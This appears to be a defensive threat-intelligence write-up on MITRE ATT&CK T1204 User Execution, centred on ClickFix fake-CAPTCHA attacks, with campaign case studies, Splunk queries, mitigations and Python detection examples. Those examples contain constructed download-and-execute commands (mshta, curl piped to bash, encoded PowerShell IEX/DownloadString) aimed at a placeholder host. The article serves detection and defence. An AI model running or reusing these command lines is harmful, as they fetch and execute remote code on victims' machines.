Microsoft Defender Experts observed ClickFix attacks affecting thousands of devices per month in early 2025, even in environments with EDR enabled. The Center for Internet Security (CIS) reported that ClickFix-related activity comprised over a third of all non-malware network monitoring alerts in the first half of 2025. The technique works because the user executes the malicious command themselves — bypassing email filters, browser sandboxes, downloaded file restrictions, and application control policies that are designed to prevent automated execution. T1204 has five sub-techniques covering malicious links, malicious files, malicious container images, malicious copy-and-paste (ClickFix), and malicious applications. Its adoption spans every major threat actor category: APT groups (COLDRIVER, APT28, MuddyWater, Lazarus), ransomware affiliates (Interlock), and commodity malware operators (Lumma Stealer, DarkGate, NetSupport RAT).
T1204 falls under the Execution tactic (TA0002). Unlike techniques where the adversary directly exploits a vulnerability or executes code through system features, User Execution requires the target to take an action — opening a file, clicking a link, running a command, or deploying a container image. This human-in-the-loop requirement means that social engineering quality determines the technique's success rate. Poorly crafted lures fail. Convincing ones — especially those that exploit familiarity with common interfaces like CAPTCHAs, browser error messages, or IT support workflows — succeed at alarming rates.
The technique spans every platform: Windows, macOS, Linux, containers, and IaaS cloud environments. User Execution is frequently the follow-on behavior from Phishing (T1566) during initial access, but it also occurs later in the attack lifecycle when adversaries place malicious files on shared drives, send internal spearphishing messages, or compromise legitimate websites to serve ClickFix lures.
The Five Sub-Techniques
T1204.001 — Malicious Link
The user clicks a link that leads to code execution. This may be a link in a phishing email that downloads a malicious file, redirects to an exploit kit, or opens a credential harvesting page. APT28 (Fancy Bear) has used spearphishing links extensively, including links to fake OAuth consent pages that grant attackers access to victim email accounts. NOBELIUM used USAID-themed phishing emails with links that delivered the EnvyScout HTML dropper. Gamaredon Group distributes links in phishing emails that lead to malicious document downloads targeting Ukrainian government organizations.
T1204.002 — Malicious File
The most established sub-technique, covering every scenario where a user opens a malicious file that triggers code execution. This includes macro-enabled Office documents (.doc, .xls), executables disguised as documents (.exe with document icons), script files (.vbs, .js, .hta), shortcut files (.lnk), disk image files (.iso, .img), and compressed archives containing malicious payloads. The Ryuk/TrickBot/BazarLoader attack chain relies on users opening weaponized Office documents or clicking LNK files. Mustang Panda has distributed PlugX malware through malicious documents targeting government organizations. The shift from macro-enabled documents (following Microsoft's decision to block macros in internet-downloaded files by default) has driven adversaries toward LNK, ISO, and OneNote-based delivery vectors.
T1204.003 — Malicious Image
Users deploy backdoored container images (Docker, AWS AMIs, GCP Images, Azure Images) from public repositories without realizing they contain malicious code. Adversaries upload images that appear to be legitimate development tools, databases, or applications but include cryptocurrency miners, backdoors, or data theft capabilities. The cloud-native supply chain risk makes this sub-technique particularly relevant for DevOps environments where developers routinely pull images from public registries.
T1204.004 — Malicious Copy and Paste (ClickFix)
The breakout sub-technique of 2025. Adversaries present users with fake error messages, CAPTCHA prompts, or system alerts that instruct them to open a terminal or the Windows Run dialog (Windows+R) and paste a command. The malicious command is silently copied to the clipboard when the user clicks a "Fix It" or "I'm not a robot" button, then executed when the user pastes and runs it. This bypasses email filters (no attachment to scan), browser sandboxes (no file to detonate), and application control (the user initiates the execution, not an automated process).
The ClickFix technique has been adopted by COLDRIVER (Star Blizzard) for LOSTKEYS malware delivery, by Lazarus Group's Contagious Interview campaign (ClickFake Interview), by APT28, by MuddyWater, and by commodity malware operators distributing Lumma Stealer, DarkGate, AsyncRAT, NetSupport RAT, XWorm, DanaBot, and ransomware payloads including Interlock. Microsoft's August 2025 analysis documented ClickFix campaigns targeting Portuguese, Swiss, French, and Mexican government organizations with Lampion banking malware. A viral TikTok campaign used ClickFix to distribute Aura Stealer through fake software activation commands, reaching millions of users through the platform's algorithm.
T1204.005 — Malicious Application
Users are tricked into installing malicious applications that appear legitimate. This includes trojanized versions of popular software, fake mobile apps, and browser extensions that contain malicious functionality. The Contagious Interview campaign distributes BeaverTail malware disguised as legitimate video conferencing applications (fake MiroTalk, FreeConference, Zoom). Tech support scams facilitate this sub-technique through phishing, vishing, and spoofed toll-free numbers that direct victims to download remote access tools giving adversaries direct system control.
How ClickFix Works: The 2025 Threat
ClickFix has become significant enough to warrant dedicated analysis. The attack follows a consistent pattern across campaigns.
Step 1: Lure delivery. The user reaches a ClickFix page through a phishing email, compromised website, malvertisement, SEO poisoning, or social media post. Over 5,200 compromised WordPress sites have been identified serving ClickFix lures. The pages are designed to appear as familiar interfaces: Cloudflare CAPTCHA verifications, Google reCAPTCHA prompts, browser update notifications, or Microsoft error dialogs.
Step 2: Clipboard hijacking. When the user clicks the "I'm not a robot" button or "Fix It" prompt, JavaScript silently copies a malicious command to their clipboard. The user does not see this happen. The command is typically an obfuscated mshta.exe or PowerShell command that downloads and executes a payload from a remote server.
Step 3: User self-execution. The page displays instructions telling the user to press Windows+R (opening the Run dialog), then Ctrl+V (pasting the malicious command), then Enter (executing it). On macOS, users are instructed to use Terminal. Because the user initiates the execution themselves, the activity bypasses browser sandboxes, Mark-of-the-Web restrictions, SmartScreen warnings, and application control policies that block automated downloads and execution.
Step 4: Payload deployment. The pasted command typically uses mshta.exe, PowerShell, or curl to download the final payload: Lumma Stealer, NetSupport RAT, AsyncRAT, Cobalt Strike, or other malware. Multi-stage infections are common, with the initial command downloading a script that downloads additional components.
Why User Execution Matters
Bypasses technical controls. User Execution, particularly the ClickFix variant, defeats security controls that are designed to prevent malicious code from running. Email filters cannot block a clipboard copy. Browser sandboxes cannot detonate a command the user types. Application control cannot block mshta.exe or powershell.exe if those binaries are allowed by policy. Mark-of-the-Web does not apply to commands pasted into the Run dialog. The user becomes the execution engine, bypassing the defenses designed to protect them.
The human is the vulnerability. No amount of technical hardening can fully prevent a human, even a trained one, from following convincing instructions. The ClickFix technique exploits familiarity with CAPTCHA verification — a process that billions of users complete daily without questioning. When a page that looks like Cloudflare's CAPTCHA tells you to verify your identity, the instinct to comply is powerful. Microsoft Defender Experts observed thousands of successful ClickFix infections per month in organizations with fully deployed EDR.
Cross-platform effectiveness. ClickFix works on Windows (Run dialog, PowerShell), macOS (Terminal), and Linux (shell). The same campaign can target all three platforms by varying the clipboard payload based on the detected operating system. The MacReaper watering hole campaign compromised approximately 2,800 legitimate websites to serve ClickFix prompts that delivered Atomic Stealer to macOS users.
Adopted by the full spectrum of threat actors. ClickFix is no longer only a commodity technique. APT groups (COLDRIVER for espionage, Lazarus for cryptocurrency theft, APT28 for intelligence collection, MuddyWater for Iranian operations), ransomware affiliates (Interlock ransomware targeting SLTT organizations), and commodity malware operators (Lumma Stealer MaaS, DarkGate, SocGholish/FakeUpdates) have all integrated ClickFix into their operations. This breadth of adoption reflects the technique's effectiveness across diverse objectives.
Real-World Case Studies
COLDRIVER / LOSTKEYS — ClickFix for Russian Espionage (2025)
Google's Threat Intelligence Group documented COLDRIVER (Star Blizzard), a Russian FSB-linked espionage group, using ClickFix fake CAPTCHA lures to deliver LOSTKEYS malware in January, March, and April 2025. Victims — including advisors to Western governments, journalists, and NGOs connected to Ukraine — visited decoy websites that displayed fake CAPTCHA verification prompts. Clicking "I'm not a robot" copied a PowerShell command to the clipboard, and the page instructed victims to paste and execute it via the Windows Run dialog. The command initiated a multi-stage infection chain that ultimately installed LOSTKEYS, a file-stealing VBS malware. When GTIG published their findings, COLDRIVER abandoned LOSTKEYS within five days and deployed three replacement malware families (NOROBOT, YESROBOT, MAYBEROBOT) — all still using ClickFix-style delivery.
Lazarus Group / ClickFake Interview — Targeting Cryptocurrency Developers (2025)
North Korean actors expanded their Contagious Interview campaign with a ClickFix variant dubbed "ClickFake Interview." Victims — software developers and cryptocurrency professionals — received fake job interview invitations that led to sites displaying bogus CAPTCHAs. Copying and pasting the provided "verification token" launched PowerShell commands that installed a WebSocket RAT capable of live remote access. Separately, the campaign distributed BeaverTail malware through trojanized video conferencing applications and VS Code repositories. Sekoia researchers linked the ClickFake Interview infrastructure to North Korean operations, and the FBI seized domains associated with front companies (BlockNovas LLC) used to distribute the malware.
Lampion Banking Trojan — ClickFix Targeting Government Organizations (2025)
Microsoft identified an active ClickFix campaign distributing the Lampion banking trojan, initially targeting Portuguese government organizations in May 2025 before spreading to Switzerland, Luxembourg, France, Hungary, and Mexico. The attack chain used phishing emails containing ZIP attachments with HTML files that redirected victims to a fake Portuguese tax authority website. The ClickFix lure on this site instructed users to paste and execute a command, initiating a multi-stage infection chain with multiple obfuscation layers and non-consecutive execution stages designed to evade detection.
Interlock Ransomware — ClickFix Targeting US Government (2025)
The Center for Internet Security tracked an August 2025 Interlock ransomware incident that impacted a US State, Local, Tribal, and Territorial (SLTT) government victim using ClickFix as the initial access vector. The attack demonstrates that ClickFix has crossed from commodity malware delivery into ransomware operations targeting critical infrastructure. The user-initiated execution bypassed the organization's email filters and endpoint protections, allowing the ransomware affiliate to establish a foothold and proceed to network compromise and encryption.
MacReaper / Atomic Stealer — Massive ClickFix Watering Hole Campaign
An independent researcher documented a massive ClickFix watering hole campaign dubbed MacReaper that compromised approximately 2,800 legitimate websites to serve fake CAPTCHA prompts targeting macOS users. The campaign combined ClickFix with EtherHiding — using Binance Smart Chain contracts to conceal the payload — and instructed macOS users to open Terminal and paste a command using macOS-specific keyboard shortcuts. The command downloaded and executed Atomic Stealer, a macOS infostealer that harvests browser credentials, cryptocurrency wallets, and keychain data. The scale of the watering hole infrastructure demonstrates how ClickFix can be weaponized for broad-spectrum, platform-specific malware delivery.
Ryuk / TrickBot — Traditional Malicious File Execution
The Ryuk ransomware attack chain represents the "classic" T1204.002 pattern that preceded ClickFix. Users received phishing emails with weaponized Office documents or ZIP attachments containing malicious LNK files. Opening the document and enabling macros (or executing the LNK) installed TrickBot or BazarLoader, which then deployed Cobalt Strike for lateral movement and ultimately Ryuk ransomware for encryption. While ClickFix has become the dominant new vector, traditional malicious file execution through phishing remains a primary initial access method for ransomware operations.
Detection Strategies
Detecting User Execution requires monitoring the execution artifacts rather than the social engineering itself. By the time malicious code runs, the social engineering has already succeeded — but detection can still catch the payload before it achieves its objectives.
ClickFix attacks produce a recognizable process chain: the Windows Run dialog (explorer.exe) spawns mshta.exe, powershell.exe, or cmd.exe with obfuscated command-line arguments. On macOS, Terminal spawns curl or bash with download-and-execute commands. These parent-child relationships are unusual in normal operations and provide a strong detection signal. Microsoft Defender for Office 365 has developed fake CAPTCHA behavioral signatures specifically for ClickFix detection.
Key Monitoring Points
| Data Source | What to Monitor | Detection Logic |
|---|---|---|
| Sysmon Event ID 1 (Process Creation) | ClickFix execution chain | Flag mshta.exe, powershell.exe, or cmd.exe spawned by explorer.exe with obfuscated or encoded command-line arguments, especially those containing Invoke-Expression, IEX, DownloadString, or base64 content |
| Sysmon Event ID 1 | Malicious file execution from email clients | Flag .exe, .scr, .lnk, .hta, .vbs, .js execution where the parent process is outlook.exe, thunderbird.exe, or a browser, indicating the user opened a downloaded malicious file |
| Sysmon Event ID 1 | mshta.exe with remote URLs | Flag mshta.exe execution with HTTP/HTTPS URLs in the command line. ClickFix commonly uses mshta to fetch and execute remote HTA payloads |
| PowerShell Script Block Logging (Event ID 4104) | Encoded or obfuscated commands | Flag PowerShell execution containing -EncodedCommand, FromBase64String, IEX, or Invoke-WebRequest combined with Invoke-Expression, particularly when launched from the Run dialog |
| Sysmon Event ID 15 (File Create Stream Hash) | Mark-of-the-Web on downloaded files | Monitor for execution of files with Zone.Identifier MOTW streams indicating internet origin, especially .iso, .img, .lnk, and .hta files |
| macOS / Linux Audit Logs | Terminal commands from user context | Flag curl, wget, or bash -c commands executed from Terminal that download and execute remote scripts, especially those using base64 decoding or pipe-to-bash patterns |
| Network Traffic | Outbound connections from mshta.exe/PowerShell | Flag outbound HTTPS connections from mshta.exe or powershell.exe to uncommon or newly registered domains immediately following user session activity |
Splunk Detection Queries
Query 1: ClickFix Execution Chain Detection
Detects the distinctive ClickFix pattern: mshta.exe or powershell.exe spawned from explorer.exe (the Run dialog) with download-and-execute command-line patterns.
```spl
index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
parent_process_name=explorer.exe
(process_name=mshta.exe OR process_name=powershell.exe OR process_name=cmd.exe)
(CommandLine="*http*" OR CommandLine="*Invoke-*" OR CommandLine="*IEX*"
OR CommandLine="*EncodedCommand*" OR CommandLine="*FromBase64*"
OR CommandLine="*DownloadString*" OR CommandLine="*-e *" OR CommandLine="*curl *")
| table _time host user process_name CommandLine
| sort -_time
```
Query 2: mshta.exe Fetching Remote Content
Detects mshta.exe execution with remote URLs, the most common ClickFix payload delivery mechanism.
```spl
index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
process_name=mshta.exe
(CommandLine="*http://*" OR CommandLine="*https://*")
| table _time host user CommandLine parent_process_name parent_process_path
| sort -_time
```
Query 3: Suspicious File Execution from Download Locations
Detects execution of potentially malicious file types from common download directories, indicating a user opened a malicious file from a phishing email or web download.
```spl
index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
(process_path="*\\Downloads\\*" OR process_path="*\\Temp\\*"
OR process_path="*\\AppData\\Local\\Temp\\*")
(process_name="*.exe" OR process_name="*.scr" OR process_name="*.hta"
OR process_name="*.vbs" OR process_name="*.js" OR process_name="*.bat")
NOT (process_name IN ("chrome_installer.exe","setup.exe","Teams_installer.exe"))
| table _time host user process_name process_path parent_process_name CommandLine
| sort -_time
```
Query 4: Rapid Discovery Commands After User Execution
Detects the reconnaissance burst that typically follows successful User Execution — adversaries immediately enumerate the compromised system.
```spl
index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
(process_name IN (whoami.exe, systeminfo.exe, tasklist.exe, ipconfig.exe,
net.exe, hostname.exe, nltest.exe, cmdkey.exe))
| bin _time span=120s
| stats count dc(process_name) as unique_commands values(process_name) as commands by _time host user
| where unique_commands >= 3
| sort -_time
```
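The detection logic from the Key Monitoring Points table and from Queries 1 and 4, run over a handful of constructed Sysmon Event ID 1 records (an added Python example, not part of the original page; hostnames, users and the lure URL are made up, and the burst rule generalises Query 4's fixed 120-second bins to a sliding window):

```python
"""Detection logic from the Key Monitoring Points table, Query 1 (ClickFix
execution chain) and Query 4 (discovery burst), applied to constructed
Sysmon Event ID 1 records shaped like the Splunk fields the queries use.
Added example; hosts, users and URLs are made up."""
import re
from collections import defaultdict

# Command-line markers Query 1 keys on: remote URL, IEX/Invoke-*, encoded
# or base64 content, DownloadString, "-e"/"-enc" switches, curl.
_CMD_MARKERS = re.compile(
    r"https?://|invoke-|\biex\b|encodedcommand|frombase64|downloadstring|"
    r"(?:^|\s)-e(?:c|nc)?\s|\bcurl\s",
    re.IGNORECASE,
)
# Interpreters the Run dialog (explorer.exe) launches in a ClickFix chain.
_RUN_DIALOG_CHILDREN = {"mshta.exe", "powershell.exe", "cmd.exe"}
# Discovery binaries Query 4 counts.
_DISCOVERY = {"whoami.exe", "systeminfo.exe", "tasklist.exe", "ipconfig.exe",
              "net.exe", "hostname.exe", "nltest.exe", "cmdkey.exe"}


def is_clickfix_chain(evt: dict) -> bool:
    """Query 1: explorer.exe -> mshta/powershell/cmd with a
    download-and-execute style command line."""
    return (evt["parent_process_name"].lower() == "explorer.exe"
            and evt["process_name"].lower() in _RUN_DIALOG_CHILDREN
            and bool(_CMD_MARKERS.search(evt["CommandLine"])))


def discovery_bursts(events, window=120, min_unique=3):
    """Query 4, generalised from fixed 120s bins to a sliding window so a
    burst straddling a bin boundary is not missed: flag each (host, user)
    that runs >= min_unique distinct discovery binaries within `window`
    seconds. Returns [(host, user, sorted binaries)]."""
    by_actor = defaultdict(list)
    for e in events:
        if e["process_name"].lower() in _DISCOVERY:
            by_actor[(e["host"], e["user"])].append(e)
    hits = []
    for (host, user), evs in by_actor.items():
        evs.sort(key=lambda e: e["_time"])
        for i, start in enumerate(evs):
            seen = {e["process_name"].lower() for e in evs[i:]
                    if e["_time"] - start["_time"] <= window}
            if len(seen) >= min_unique:
                hits.append((host, user, sorted(seen)))
                break  # one alert per actor is enough
    return hits


def _evt(t, host, user, parent, proc, cmd):
    return {"_time": t, "host": host, "user": user, "parent_process_name": parent,
            "process_name": proc, "CommandLine": cmd}


# Constructed sample log: one ClickFix chain on WS02 followed by recon,
# plus benign activity that must not fire.
SAMPLE_EVENTS = [
    _evt(1000, "WS01", "alice", "explorer.exe", "notepad.exe", "notepad.exe notes.txt"),
    # ClickFix step 3: Run dialog -> mshta fetching a remote HTA (placeholder URL).
    _evt(1010, "WS02", "bob", "explorer.exe", "mshta.exe",
         "mshta https://lure.example.invalid/v.hta"),
    # Admin's PowerShell from a console, not the Run dialog: no chain match.
    _evt(1020, "WS03", "ops", "cmd.exe", "powershell.exe", "powershell -c Get-Service"),
    # Recon burst on WS02 within 30 seconds of the mshta launch.
    _evt(1030, "WS02", "bob", "cmd.exe", "whoami.exe", "whoami"),
    _evt(1035, "WS02", "bob", "cmd.exe", "systeminfo.exe", "systeminfo"),
    _evt(1040, "WS02", "bob", "cmd.exe", "net.exe", "net user"),
    # Lone whoami on WS01 an hour later: below the burst threshold.
    _evt(5000, "WS01", "alice", "cmd.exe", "whoami.exe", "whoami"),
]


def run_detections(events=SAMPLE_EVENTS):
    """Apply both rules; returns what an analyst would be paged on."""
    chains = [(e["host"], e["process_name"]) for e in events if is_clickfix_chain(e)]
    return {"clickfix_chains": chains, "discovery_bursts": discovery_bursts(events)}


if __name__ == "__main__":
    for rule, hits in run_detections().items():
        print(rule, hits)
```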
Known Threat Actors and Campaigns
State-Sponsored Groups Using ClickFix (T1204.004)
| Actor | Attribution | Campaign Details |
|---|---|---|
| COLDRIVER (Star Blizzard) | Russia (FSB) | Fake CAPTCHA ClickFix delivering LOSTKEYS, then NOROBOT/YESROBOT/MAYBEROBOT for espionage against Western government advisors and NGOs (2025) |
| APT28 (Fancy Bear) | Russia (GRU) | ClickFix campaigns integrated into espionage operations targeting government organizations |
| MuddyWater | Iran (MOIS) | ClickFix adoption in cyber espionage campaigns |
| Lazarus / Contagious Interview | North Korea | ClickFake Interview variant using fake job assessments with ClickFix for BeaverTail/InvisibleFerret delivery targeting cryptocurrency developers |
Ransomware and Cybercrime Using User Execution
| Actor / Campaign | T1204 Usage |
|---|---|
| Interlock Ransomware | ClickFix delivery targeting US SLTT government organizations (August 2025 CIS incident) |
| Ryuk / TrickBot / BazarLoader | Malicious Office documents and LNK files in phishing emails for ransomware deployment chain |
| SocGholish (FakeUpdates) | Fake browser update prompts leading to malware execution; ClickFix variants observed in 2025 |
| Storm-1865 | ClickFix campaign impersonating Booking.com targeting hospitality industry (North America, Europe, Asia) |
| ClearFake | Compromised websites injecting ClickFix JavaScript for fake browser update delivery |
Infostealers and Commodity Malware
| Malware | T1204 Usage |
|---|---|
| Lumma Stealer | Widely distributed via ClickFix since December 2024; targeting SLTT organizations and general users through fake CAPTCHAs |
| Atomic Stealer (macOS) | Distributed via MacReaper watering hole campaign (2,800+ compromised sites) using ClickFix with EtherHiding |
| DarkGate | ClickFix delivery through fake Google Meet pages and phishing |
| NetSupport RAT | Legitimate RMM tool trojanized and distributed via ClickFix fake browser updates (eSentire, January 2025) |
| AsyncRAT / VenomRAT / XWorm | Multi-stage ClickFix infection chains with XOR encryption and AMSI bypasses (Trustwave SpiderLabs) |
| Aura Stealer | Distributed through viral TikTok ClickFix campaign with fake software activation commands |
| Lampion | Banking trojan targeting government organizations via ClickFix (Portugal, Switzerland, France, Mexico; active June 2025) |
Defensive Recommendations
1. Restrict Windows Run dialog and script interpreter access
ClickFix attacks depend on users being able to open the Windows Run dialog (Windows+R) and execute commands through mshta.exe or powershell.exe. Apply Group Policy restrictions that disable or restrict the Run dialog for standard users. Use AppLocker or WDAC to block execution of mshta.exe, wscript.exe, and cscript.exe for non-administrative users. Restrict PowerShell to Constrained Language Mode on workstations. These controls directly counter the ClickFix execution chain.
2. Deploy Attack Surface Reduction (ASR) rules
Microsoft's ASR rules provide targeted protection against User Execution vectors. Enable rules that block Office applications from creating child processes, block execution of potentially obfuscated scripts, block executable content from email client and webmail, and block JavaScript or VBScript from launching downloaded executable content. These rules address both traditional malicious file execution (T1204.002) and script-based ClickFix payloads (T1204.004).
3. Implement ClickFix-specific user awareness training
Traditional phishing awareness training focuses on "don't click links" and "don't open attachments." ClickFix bypasses both of these rules by having users execute commands themselves. Update security awareness programs to specifically address: legitimate CAPTCHAs never require running commands; no website should ever ask you to press Windows+R and paste anything; if a webpage asks you to copy and paste into Terminal, PowerShell, or Command Prompt, it is malicious. Include ClickFix examples in phishing simulations.
4. Deploy clipboard monitoring and intervention
ClickFix works by silently copying malicious commands to the user's clipboard. Zero Trust Network Access (ZTNA) solutions like Appgate SDP can be configured as "speed bumps" that warn users when potentially malicious content is detected in the clipboard before execution. EDR solutions can also monitor for clipboard content that contains PowerShell commands, encoded content, or download URLs, and alert or block execution.
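The clipboard-content check described in this recommendation, as an added Python example (not any vendor's code): a heuristic classifier a clipboard monitor would apply before the paste, which also decodes a PowerShell -EncodedCommand argument so markers hidden by the base64/UTF-16LE encoding still count. The sample strings and their placeholder domain are constructed; the platform-specific clipboard hook itself is left out.

```python
"""Heuristic classifier for clipboard text, of the kind an EDR-style
clipboard monitor (recommendation 4 above) would run before the user can
paste into the Run dialog or Terminal. Added example, not any vendor's
code. It decodes PowerShell -EncodedCommand arguments (base64 of UTF-16LE)
so markers hidden by the encoding are still scored. Samples are constructed."""
import base64
import binascii
import re
from typing import Optional

# Markers the page associates with ClickFix payload commands.
_SIGNS = {
    "remote_url": re.compile(r"https?://", re.I),
    "mshta": re.compile(r"\bmshta(?:\.exe)?\b", re.I),
    "ps_download_exec": re.compile(
        r"\biex\b|invoke-expression|downloadstring|invoke-webrequest|\biwr\b", re.I),
    "hidden_or_noprofile": re.compile(r"-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b", re.I),
    "pipe_to_shell": re.compile(r"\|\s*(?:ba)?sh\b|base64\s+(?:-d|--decode)\b", re.I),
}
# -e, -ec, -en, -enc, -EncodedCommand followed by a base64 blob.
_ENC = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent/undecodable
    (e.g. a benign '-e' switch followed by something that is not base64)."""
    m = _ENC.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def classify_clipboard(text: str) -> dict:
    """Score clipboard text; two or more distinct markers is treated as
    ClickFix-like. A lone URL (as in a pasted git clone) is not enough."""
    decoded = decode_encoded_command(text)
    haystack = text if decoded is None else text + "\n" + decoded
    reasons = [name for name, rx in _SIGNS.items() if rx.search(haystack)]
    if decoded is not None:
        reasons.append("encoded_command")
    return {"suspicious": len(reasons) >= 2, "reasons": reasons, "decoded": decoded}


# Constructed samples (placeholder domain, never resolvable).
_HIDDEN = "IEX (New-Object Net.WebClient).DownloadString('http://lure.example.invalid/a')"
SAMPLE_ENCODED = ("powershell -w hidden -nop -enc "
                  + base64.b64encode(_HIDDEN.encode("utf-16-le")).decode())
SAMPLE_MSHTA = "mshta https://lure.example.invalid/v.hta"
SAMPLE_MAC = "curl -fsSL https://lure.example.invalid/s | bash"
SAMPLE_BENIGN = "git clone https://github.com/example/repo.git"

if __name__ == "__main__":
    for s in (SAMPLE_ENCODED, SAMPLE_MSHTA, SAMPLE_MAC, SAMPLE_BENIGN):
        verdict = classify_clipboard(s)
        print(verdict["suspicious"], verdict["reasons"])
```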
5. Block mshta.exe for standard users
mshta.exe is the single most commonly abused binary in ClickFix attacks because it can fetch and execute remote HTA files with a single command. Blocking mshta.exe execution for non-administrative users via AppLocker or WDAC eliminates the primary ClickFix payload delivery mechanism. This has minimal operational impact because legitimate business applications rarely require mshta.exe.
6. Enable Mark-of-the-Web enforcement
Ensure that Windows SmartScreen and Mark-of-the-Web (MOTW) are enforced for all users. MOTW tags files downloaded from the internet, triggering additional security checks before execution. While ClickFix bypasses MOTW (because the command is pasted, not downloaded as a file), MOTW protections remain critical for traditional malicious file execution (T1204.002) through ISO, LNK, and executable delivery vectors.
7. Monitor for post-execution reconnaissance
Successful User Execution is almost always followed by immediate reconnaissance: whoami, systeminfo, tasklist, ipconfig, and net commands executed within seconds. Build detection rules that fire on this rapid discovery pattern following new process execution from download locations or the Run dialog. The execution-then-discovery pattern is a strong indicator of a successful User Execution attack.
8. Implement browser isolation for high-risk users
Remote Browser Isolation (RBI) renders web content in an isolated environment, preventing ClickFix JavaScript from accessing the user's actual clipboard. Even if the user follows the ClickFix instructions, the malicious command is not copied to their real system clipboard. RBI is particularly valuable for high-risk users who are targeted by nation-state ClickFix campaigns: government advisors, journalists, researchers, and executives.
MITRE ATT&CK Mapping
| Field | Value |
|---|---|
| Technique ID | T1204 |
| Technique Name | User Execution |
| Tactics | Execution (TA0002) |
| Platforms | Windows, Linux, macOS, Containers, IaaS |
| Sub-Techniques | T1204.001 Malicious Link, T1204.002 Malicious File, T1204.003 Malicious Image, T1204.004 Malicious Copy and Paste, T1204.005 Malicious Application |
| Data Sources | Process (Creation), File (Creation), Network Traffic (Connection, Content), Application Log (Content), Instance (Creation), Command (Execution) |
| Mitigations | Execution Prevention (M1038), User Training (M1017), Behavior Prevention on Endpoint (M1040), Network Intrusion Prevention (M1031), Restrict Web-Based Content (M1021) |
| Version | 1.8 (last modified October 2025) |
| MITRE Reference | attack.mitre.org/techniques/T1204 |
Sources and References
- MITRE ATT&CK — T1204 User Execution: attack.mitre.org
- Microsoft Security Blog — Think Before You Click(Fix): Analyzing the ClickFix Social Engineering Technique (August 2025): microsoft.com
- Center for Internet Security — ClickFix: An Adaptive Social Engineering Technique: cisecurity.org
- Google Threat Intelligence Group — COLDRIVER Using New Malware (LOSTKEYS) via ClickFix: cloud.google.com
- Proofpoint — From Clipboard to Compromise: A PowerShell Self-Pwn (ClickFix Analysis): proofpoint.com
- SOCRadar — ClickFix and FileFix: How a Copy-Paste Trick Became 2025's Top Social Engineering Threat: socradar.io
- Security Risk Advisors — Beware of ClickFix: A Growing Social Engineering Threat: sra.io
- Darktrace — Unpacking ClickFix: Detection Insights (2025): darktrace.com
- US HHS HC3 — ClickFix Attacks Sector Alert: hhs.gov